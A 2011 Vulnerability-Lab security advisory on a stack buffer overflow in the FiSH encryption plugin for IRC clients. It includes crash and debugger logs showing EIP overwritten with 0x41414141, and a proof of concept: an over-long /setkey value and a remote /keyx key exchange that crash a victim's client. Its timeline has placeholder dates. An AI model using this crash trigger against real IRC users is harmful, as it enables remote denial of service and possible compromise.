Document Title: =============== Fish Encryption IRC - Stack Buffer Overflow Vulnerability References (Source): ==================== http://fish.secure.la/forum/viewtopic.php?f=2&t=595 Video Exploitation: http://www.youtube.com/watch?v=r0kA8imtYSw Release Date: ============= 2011-06-07 Vulnerability Laboratory ID (VL-ID): ==================================== 37 Product & Service Introduction: =============================== FiSH ist die gängigste Umsetzung für Verschlüsselung auf der Anwenderseite. Es ermöglicht sowohl in Privatfenstern (Queries) mit zwei Benutzern, als auch in Channels mit einer unbegrenzten Benutzeranzahl die Anwendung von Verschlüsselung. Anders als die asymmetrische Kryptoverfahren, die andere Umsetzungen (beispielsweise OTR) für diesen Zweck verwenden, steht hinter dem FiSH-Konzept eine symmetrische Lösung. Der Grund ist einfach wie plausibel: asymmetrische Verschlüsselung ist spezifisch für einen Empfänger bestimmt. Es ist also nicht möglich einen Text zu verschlüsseln, der von mehreren Teilnehmern gleichzeitig gelesen werden kann. Gerade dies ist aber in Channels mit mehreren, womöglich Hunderten, Benutzern aber unumgänglich. Vor jeder Benutzung von FiSH steht in Channels also die (einmalige) Einigung auf ein gemeinsames, geheimes Passwort um die Kommunikation dort zu verschlüsseln. Dies muss im Vorfeld über einen sicheren Kanal stattfinden, damit die Verbindung nicht von vornherein kontaminiert ist. Symmetrische Verschlüsselung kann nämlich jederzeit nachträglich entschlüsselt werden, sobald das Kennwort dafür bekannt ist. In Privatfenstern mit zwei Teilnehmern, den Queries, entfällt dieser lästige Zwang, da sich FiSH hier automatisch mit dem anderen Teilnehmer auf einen Schlüssel einigen kann, der über den DH-Schlüsselaustausch sicher erfolgen kann. Plugins im verwendeten IRC-Klienten sorgen von da an dafür, dass die Kommunikation transparent verschlüsselt erfolgen kann. Gegenwärtig wird mIRC, irssi und xchat (einschließlich xchat Aqua und xchat für Windows) unterstützt. Das mIRC Plugin für Windows bringt ein grafisches Menü mit, die irssi und xchat Variante ein gutes, züchtiges Kommandozeileninterface, das über IRC-Kommandos (”/befehl”) gesteuert werden kann. (Copy of the Vendor Homepage http://burnachurch.com/65/fish-verschluesselt-ins-irc/ ) Abstract Advisory Information: ============================== Vulnerability-Lab discovered a remote Stack-Overflow Vulnerability for Fish Encrpytion on Internet Relay Chat(IRC). A remote attacker is able to crash the client via remote Stack-Overflow and get privilegs on the affected process. Vulnerability Disclosure Timeline: ================================== 2009-09-09: Vendor Notification 2010-00-00: Vendor Response/Feedback 2010-00-00: Vendor Fix/Patch 2010-12-24: Public or Non-Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ Due to the lack of a over-sized exchange via presshare (key), an attacker is able to crash the client of the encryption addon. An attacker can get the privileges of the affected running system process (client) when successfully exploited. --- Crash Log --- Problemereignisname: APPCRASH Anwendungsname: xchat.exe Anwendungsversion: 2.8.7.5 Anwendungszeitstempel: 4972edbc Fehlermodulname: StackHash_0c33 Fehlermodulversion: 0.0.0.0 Fehlermodulzeitstempel: 00000000 Ausnahmecode: c0000005 Ausnahmeoffset: 41414141 Betriebsystemversion: 6.0.6002.2.2.0.768.3 Gebietsschema-ID: 1031 Zusatzinformation 1: 0c33 Zusatzinformation 2: 199cc907df8a4654c8ebf31545ec3b64 Zusatzinformation 3: b80a Zusatzinformation 4: ac932fb721b478be6e53cf5b63cba0e7 --- Exception Logs --- (e68.1330): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000000 ecx=758998da edx=000002f9 esi=038456d0 edi=03908f78 eip=41414141 esp=0018dcf4 ebp=0018dd08 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 41414141 ?? ??? 0:000> g (e68.1330): Access violation - code c0000005 (!!! second chance !!!) eax=00000003 ebx=00000000 ecx=758998da edx=000002f9 esi=038456d0 edi=03908f78 eip=41414141 esp=0018dcf4 ebp=0018dd08 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 41414141 ?? Proof of Concept (PoC): ======================= The vulnerability can be exploited/reproduced by local or remote attackers. For example or reporduce ... Local: Insert a key with command /setkey AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+ "..." Key got saved and App crashs directly. The result is a Stack-Overflow. Remote: Now restart Client and use the /keyx command for the Diffie-Hellman-Keyexchange to the person in query. When the attacker handles an key exchange with the victim, the client of the victim crashs. The result is a Stack-Overflow. - /keyx [] Perform DH1080 KeyXchange with target. If no target specified, the KeyXchange takes place with the current query window. Result: |23:27:35| * rm (~rm@EclipticX-71284D9.dip.t-dialin.net) Quit (Input/output error) --- Debug Logs --- FAULTING_IP: +15d4 41414141 ?? ??? EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 41414141 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 FAULTING_THREAD: 00001330 PROCESS_NAME: xchat.exe ADDITIONAL_DEBUG_TEXT: Use '!findthebuild' command to search for the target build information. If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols. FAULTING_MODULE: 75bf0000 kernel32 DEBUG_FLR_IMAGE_TIMESTAMP: 495d2be4 MODULE_NAME: libcairo_2 ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 41414141 READ_ADDRESS: 41414141 FOLLOWUP_IP: libcairo_2!cairo_path_destroy+15d4 68dd5e94 8b5508 mov edx,dword ptr [ebp+8] FAILED_INSTRUCTION_ADDRESS: +6567952f0261dd40 41414141 ?? ??? IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at \bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_WRONG_SYMBOLS_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_FILL_PATTERN_41414141 FRAME_ONE_INVALID: 1 LAST_CONTROL_TRANSFER: from 41414141 to 41414141 STACK_TEXT: WARNING: Frame IP not in any known module. Following frames may be wrong. 0018dcf0 41414141 41414141 41414141 41414141 0x41414141 0018dd08 41414141 41414141 41414141 41414141 0x41414141 0018dd0c 41414141 41414141 41414141 41414141 0x41414141 0018dd10 41414141 41414141 41414141 41414141 0x41414141 0018dd14 41414141 41414141 41414141 41414141 0x41414141 0018dd18 41414141 41414141 41414141 41414141 0x41414141 0018dd1c 41414141 41414141 41414141 41414141 0x41414141 0018dd20 41414141 41414141 41414141 41414141 0x41414141 0018dd24 41414141 41414141 41414141 41414141 0x41414141 0018dd28 41414141 41414141 41414141 41414141 0x41414141 0018dd2c 41414141 41414141 41414141 41414141 0x41414141 0018dd30 41414141 41414141 41414141 41414141 0x41414141 0018dd34 41414141 41414141 41414141 41414141 0x41414141 0018dd38 41414141 41414141 41414141 41414141 0x41414141 0018dd3c 41414141 41414141 41414141 41414141 0x41414141 0018dd40 41414141 41414141 41414141 41414141 0x41414141 0018dd44 41414141 41414141 41414141 41414141 0x41414141 0018dd48 41414141 41414141 41414141 41414141 0x41414141 0018dd4c 41414141 41414141 41414141 41414141 0x41414141 0018dd50 41414141 41414141 41414141 41414141 0x41414141 0018dd54 41414141 41414141 41414141 41414141 0x41414141 0018dd58 41414141 41414141 41414141 41414141 0x41414141 0018dd5c 41414141 41414141 41414141 41414141 0x41414141 0018dd60 41414141 41414141 41414141 41414141 0x41414141 0018dd64 41414141 41414141 41414141 41414141 0x41414141 0018dd68 41414141 41414141 41414141 41414141 0x41414141 0018dd6c 41414141 41414141 41414141 41414141 0x41414141 0018dd70 41414141 41414141 41414141 41414141 0x41414141 0018dd74 41414141 41414141 41414141 41414141 0x41414141 0018dd78 41414141 41414141 41414141 41414141 0x41414141 0018dd7c 41414141 41414141 41414141 41414141 0x41414141 0018dd80 41414141 41414141 41414141 41414141 0x41414141 0018dd84 41414141 41414141 41414141 41414141 0x41414141 0018dd88 41414141 41414141 41414141 41414141 0x41414141 0018dd8c 41414141 41414141 41414141 41414141 0x41414141 0018dd90 41414141 41414141 41414141 41414141 0x41414141 0018dd94 41414141 41414141 41414141 41414141 0x41414141 0018dd98 41414141 41414141 41414141 41414141 0x41414141 0018dd9c 41414141 41414141 41414141 41414141 0x41414141 0018dda0 41414141 41414141 41414141 41414141 0x41414141 0018dda4 41414141 41414141 41414141 41414141 0x41414141 0018dda8 41414141 41414141 41414141 41414141 0x41414141 0018ddac 41414141 41414141 41414141 41414141 0x41414141 0018ddb0 41414141 41414141 41414141 41414141 0x41414141 0018ddb4 41414141 41414141 41414141 41414141 0x41414141 0018ddb8 41414141 41414141 41414141 41414141 0x41414141 0018ddbc 41414141 41414141 41414141 41414141 0x41414141 0018ddc0 41414141 41414141 41414141 41414141 0x41414141 0018ddc4 41414141 41414141 41414141 41414141 0x41414141 0018ddc8 41414141 41414141 41414141 41414141 0x41414141 0018ddcc 41414141 41414141 41414141 41414141 0x41414141 0018ddd0 41414141 41414141 41414141 41414141 0x41414141 0018ddd4 41414141 41414141 41414141 41414141 0x41414141 0018ddd8 41414141 41414141 41414141 41414141 0x41414141 0018dddc 41414141 41414141 41414141 41414141 0x41414141 0018dde0 41414141 41414141 41414141 41414141 0x41414141 0018dde4 41414141 41414141 41414141 41414141 0x41414141 0018dde8 41414141 41414141 41414141 41414141 0x41414141 0018ddec 41414141 41414141 41414141 41414141 0x41414141 0018ddf0 41414141 41414141 41414141 41414141 0x41414141 0018ddf4 41414141 41414141 41414141 41414141 0x41414141 0018ddf8 41414141 41414141 41414141 41414141 0x41414141 0018ddfc 41414141 41414141 41414141 41414141 0x41414141 0018de00 41414141 41414141 41414141 41414141 0x41414141 0018de04 41414141 41414141 41414141 41414141 0x41414141 0018de08 41414141 41414141 41414141 41414141 0x41414141 0018de0c 41414141 41414141 41414141 41414141 0x41414141 0018de10 41414141 41414141 41414141 41414141 0x41414141 0018de14 41414141 41414141 41414141 41414141 0x41414141 0018de18 41414141 41414141 41414141 41414141 0x41414141 0018de1c 41414141 41414141 41414141 41414141 0x41414141 0018de20 41414141 41414141 41414141 41414141 0x41414141 0018de24 41414141 41414141 41414141 41414141 0x41414141 0018de28 41414141 41414141 41414141 41414141 0x41414141 0018de2c 41414141 41414141 41414141 41414141 0x41414141 0018de30 41414141 41414141 41414141 41414141 0x41414141 0018de34 41414141 41414141 41414141 41414141 0x41414141 0018de38 41414141 41414141 41414141 41414141 0x41414141 0018de3c 41414141 41414141 41414141 41414141 0x41414141 0018de40 41414141 41414141 41414141 41414141 0x41414141 0018de44 41414141 41414141 41414141 41414141 0x41414141 0018de48 41414141 41414141 41414141 41414141 0x41414141 0018de4c 41414141 41414141 41414141 41414141 0x41414141 0018de50 41414141 41414141 41414141 41414141 0x41414141 0018de54 41414141 41414141 41414141 41414141 0x41414141 0018de58 41414141 41414141 41414141 41414141 0x41414141 0018de5c 41414141 41414141 41414141 41414141 0x41414141 0018de60 41414141 41414141 41414141 41414141 0x41414141 0018de64 41414141 41414141 41414141 41414141 0x41414141 0018de68 41414141 41414141 41414141 41414141 0x41414141 0018de6c 41414141 41414141 41414141 41414141 0x41414141 0018de70 41414141 41414141 41414141 41414141 0x41414141 0018de74 41414141 41414141 41414141 41414141 0x41414141 0018de78 41414141 41414141 41414141 41414141 0x41414141 0018de7c 41414141 41414141 41414141 41414141 0x41414141 0018de80 41414141 41414141 41414141 41414141 0x41414141 0018de84 41414141 41414141 41414141 41414141 0x41414141 0018de88 41414141 41414141 41414141 41414141 0x41414141 0018de8c 41414141 41414141 41414141 41414141 0x41414141 0018de90 41414141 41414141 41414141 41414141 0x41414141 0018de94 41414141 41414141 41414141 41414141 0x41414141 0018de98 41414141 41414141 41414141 41414141 0x41414141 0018de9c 41414141 41414141 41414141 41414141 0x41414141 0018dea0 41414141 41414141 41414141 41414141 0x41414141 0018dea4 41414141 41414141 41414141 41414141 0x41414141 0018dea8 41414141 41414141 41414141 41414141 0x41414141 0018deac 41414141 41414141 41414141 41414141 0x41414141 0018deb0 41414141 41414141 41414141 41414141 0x41414141 0018deb4 41414141 41414141 41414141 41414141 0x41414141 0018deb8 41414141 41414141 41414141 41414141 0x41414141 0018debc 41414141 41414141 41414141 41414141 0x41414141 0018dec0 41414141 41414141 41414141 41414141 0x41414141 0018dec4 41414141 41414141 41414141 41414141 0x41414141 0018dec8 41414141 41414141 41414141 41414141 0x41414141 0018decc 41414141 41414141 41414141 41414141 0x41414141 0018ded0 41414141 41414141 41414141 41414141 0x41414141 0018ded4 41414141 41414141 41414141 41414141 0x41414141 0018ded8 41414141 41414141 41414141 41414141 0x41414141 0018dedc 41414141 41414141 41414141 41414141 0x41414141 0018dee0 41414141 41414141 41414141 41414141 0x41414141 0018dee4 41414141 41414141 41414141 41414141 0x41414141 0018dee8 41414141 41414141 41414141 41414141 0x41414141 0018deec 41414141 41414141 41414141 41414141 0x41414141 0018def0 41414141 41414141 41414141 41414141 0x41414141 0018def4 41414141 41414141 41414141 41414141 0x41414141 0018def8 41414141 41414141 41414141 41414141 0x41414141 0018defc 41414141 41414141 41414141 41414141 0x41414141 0018df00 41414141 41414141 41414141 41414141 0x41414141 0018df04 41414141 41414141 41414141 41414141 0x41414141 0018df08 41414141 41414141 41414141 41414141 0x41414141 0018df0c 41414141 41414141 41414141 41414141 0x41414141 0018df10 41414141 41414141 41414141 41414141 0x41414141 0018df14 41414141 41414141 41414141 41414141 0x41414141 0018df18 41414141 41414141 41414141 41414141 0x41414141 0018df1c 41414141 41414141 41414141 41414141 0x41414141 0018df20 41414141 41414141 41414141 41414141 0x41414141 0018df24 41414141 41414141 41414141 41414141 0x41414141 0018df28 41414141 41414141 41414141 41414141 0x41414141 0018df2c 41414141 41414141 41414141 41414141 0x41414141 0018df30 41414141 41414141 41414141 41414141 0x41414141 0018df34 41414141 41414141 41414141 41414141 0x41414141 0018df38 41414141 41414141 41414141 41414141 0x41414141 0018df3c 41414141 41414141 41414141 41414141 0x41414141 0018df40 41414141 41414141 41414141 41414141 0x41414141 0018df44 41414141 41414141 41414141 41414141 0x41414141 0018df48 41414141 41414141 41414141 41414141 0x41414141 0018df4c 41414141 41414141 41414141 41414141 0x41414141 0018df50 41414141 41414141 41414141 41414141 0x41414141 0018df54 41414141 41414141 41414141 41414141 0x41414141 0018df58 41414141 41414141 41414141 41414141 0x41414141 0018df5c 41414141 41414141 41414141 41414141 0x41414141 0018df60 41414141 41414141 41414141 41414141 0x41414141 0018df64 41414141 41414141 41414141 41414141 0x41414141 0018df68 41414141 41414141 41414141 41414141 0x41414141 0018df6c 41414141 41414141 41414141 41414141 0x41414141 0018df70 41414141 41414141 41414141 41414141 0x41414141 0018df74 41414141 41414141 41414141 41414141 0x41414141 0018df78 41414141 41414141 41414141 41414141 0x41414141 0018df7c 41414141 41414141 41414141 41414141 0x41414141 0018df80 41414141 41414141 41414141 41414141 0x41414141 0018df84 41414141 41414141 41414141 41414141 0x41414141 0018df88 41414141 41414141 41414141 41414141 0x41414141 0018df8c 41414141 41414141 41414141 41414141 0x41414141 0018df90 41414141 41414141 41414141 41414141 0x41414141 0018df94 41414141 41414141 41414141 41414141 0x41414141 0018df98 41414141 41414141 41414141 41414141 0x41414141 0018df9c 41414141 41414141 41414141 41414141 0x41414141 0018dfa0 41414141 41414141 41414141 41414141 0x41414141 0018dfa4 41414141 41414141 41414141 41414141 0x41414141 0018dfa8 41414141 41414141 41414141 41414141 0x41414141 0018dfac 41414141 41414141 41414141 41414141 0x41414141 0018dfb0 41414141 41414141 41414141 41414141 0x41414141 0018dfb4 41414141 41414141 41414141 41414141 0x41414141 0018dfb8 41414141 41414141 41414141 41414141 0x41414141 0018dfbc 41414141 41414141 41414141 41414141 0x41414141 0018dfc0 41414141 41414141 41414141 41414141 0x41414141 0018dfc4 41414141 41414141 41414141 41414141 0x41414141 0018dfc8 41414141 41414141 41414141 41414141 0x41414141 0018dfcc 41414141 41414141 41414141 41414141 0x41414141 0018dfd0 41414141 41414141 41414141 41414141 0x41414141 0018dfd4 41414141 41414141 41414141 41414141 0x41414141 0018dfd8 41414141 41414141 41414141 41414141 0x41414141 0018dfdc 41414141 41414141 41414141 41414141 0x41414141 0018dfe0 41414141 41414141 41414141 41414141 0x41414141 0018dfe4 41414141 41414141 41414141 41414141 0x41414141 0018dfe8 41414141 41414141 41414141 41414141 0x41414141 0018dfec 41414141 41414141 41414141 41414141 0x41414141 0018dff0 41414141 41414141 41414141 41414141 0x41414141 0018dff4 41414141 41414141 41414141 41414141 0x41414141 0018dff8 41414141 41414141 41414141 41414141 0x41414141 0018dffc 41414141 41414141 41414141 41414141 0x41414141 0018e000 41414141 41414141 41414141 41414141 0x41414141 0018e004 41414141 41414141 41414141 41414141 0x41414141 0018e008 41414141 41414141 41414141 41414141 0x41414141 0018e00c 41414141 41414141 41414141 41414141 0x41414141 0018e010 41414141 41414141 41414141 41414141 0x41414141 0018e014 41414141 41414141 41414141 41414141 0x41414141 0018e018 41414141 41414141 41414141 41414141 0x41414141 0018e01c 41414141 41414141 41414141 41414141 0x41414141 0018e020 41414141 41414141 41414141 41414141 0x41414141 0018e024 41414141 41414141 41414141 41414141 0x41414141 0018e028 41414141 41414141 41414141 41414141 0x41414141 0018e02c 41414141 41414141 41414141 41414141 0x41414141 0018e030 41414141 41414141 41414141 41414141 0x41414141 0018e034 41414141 41414141 41414141 41414141 0x41414141 0018e038 41414141 41414141 41414141 41414141 0x41414141 0018e03c 41414141 41414141 41414141 41414141 0x41414141 0018e040 41414141 41414141 41414141 41414141 0x41414141 0018e044 41414141 41414141 41414141 41414141 0x41414141 0018e048 41414141 41414141 41414141 41414141 0x41414141 0018e04c 41414141 41414141 41414141 41414141 0x41414141 0018e050 41414141 41414141 41414141 41414141 0x41414141 0018e054 41414141 41414141 41414141 41414141 0x41414 SYMBOL_STACK_INDEX: 170 SYMBOL_NAME: libcairo_2!cairo_path_destroy+15d4 FOLLOWUP_NAME: MachineOwner IMAGE_NAME: libcairo-2.dll STACK_COMMAND: ~0s ; kb BUCKET_ID: WRONG_SYMBOLS FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_FILL_PATTERN_41414141_c0000005_libcairo-2.dll!cairo_path_destroy WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/xchat_exe/2_8_6_0/49b43202/unknown/0_0_0_0/bbbbbbb4/c0000005/41414141.htm?Retriage=1 Followup: MachineOwner --------- 0:000> lmvm libcairo_2 start end module name 68dc0000 68e64000 libcairo_2 (export symbols) C:\Program Files (x86)\X-Chat 2\lib\libcairo-2.dll Loaded symbol image file: C:\Program Files (x86)\X-Chat 2\lib\libcairo-2.dll Image path: C:\Program Files (x86)\X-Chat 2\lib\libcairo-2.dll Image name: libcairo-2.dll Timestamp: Thu Jan 01 21:47:32 2009 (495D2BE4) CheckSum: 000CFAB2 ImageSize: 000A4000 Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4 0:000> lmvm kernel32 start end module name 75bf0000 75cf0000 kernel32 (export symbols) C:\Windows\syswow64\kernel32.dll Loaded symbol image file: C:\Windows\syswow64\kernel32.dll Image path: C:\Windows\syswow64\kernel32.dll Image name: kernel32.dll Timestamp: Tue Jul 14 03:14:06 2009 (4A5BDBDE) CheckSum: 000D900E ImageSize: 00100000 File version: 6.1.7600.16385 Product version: 6.1.7600.16385 File flags: 0 (Mask 3F) File OS: 40004 NT Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Microsoft Corporation ProductName: Microsoft® Windows® Operating System InternalName: kernel32 OriginalFilename: kernel32 ProductVersion: 6.1.7600.16385 FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) FileDescription: Windows NT BASE API Client DLL LegalCopyright: © Microsoft Corporation. All rights reserved. 0:000> .exr 0xffffffffffffffff ExceptionAddress: 41414141 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 Video Exploitation: http://www.youtube.com/watch?v=r0kA8imtYSw Pictures: ../Bildschirmfoto.png ../overflow.png ../zmh2mq.jpg ../asd2.JPG ../asd.JPG Solution - Fix & Patch: ======================= Restrict the max. keysize & stringsize what can be inserted by users. Set a own exception-handling when somebody insert higher strings & locate the stack with a restriction. Security Risk: ============== An attacker is able to crash the XChat, Mirc & Irssi clients on the remote way with via a stack buffer overflow vulnerability. When successfully exploited an attack can get the privileges of the affected vulnerable running system process. Credits & Authors: ================== Rem0ve Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory